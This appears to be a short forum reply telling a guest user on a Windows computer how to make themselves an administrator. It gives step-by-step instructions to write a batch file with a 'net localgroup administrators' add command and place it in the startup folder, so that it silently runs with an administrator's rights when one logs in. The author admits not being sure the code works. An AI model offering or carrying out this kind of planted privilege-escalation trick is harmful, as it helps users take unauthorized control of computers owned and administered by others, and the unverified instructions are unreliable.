Well if you have admin rights, only then you can switch statuses of other accounts, as a guest you cant.
But if you are a guest, and want an admin account. Follow these Step:
1] Create your account
2] Open Notepad
3] type in "net localgroup administrators <username> /add" [ without quotes]
4] Save it as <anyname>.bat [ makesure it has .bat at the end]
5] Place it in the startup folder.
Doing this, it will run this file every time someone logs on a computer, if its a guest, it wont do anything, but if a admin logs in, It will automatically make you an admin.
*I think thats how the code goes, but i am not sure, just try it out and tell me if it doesnt work*
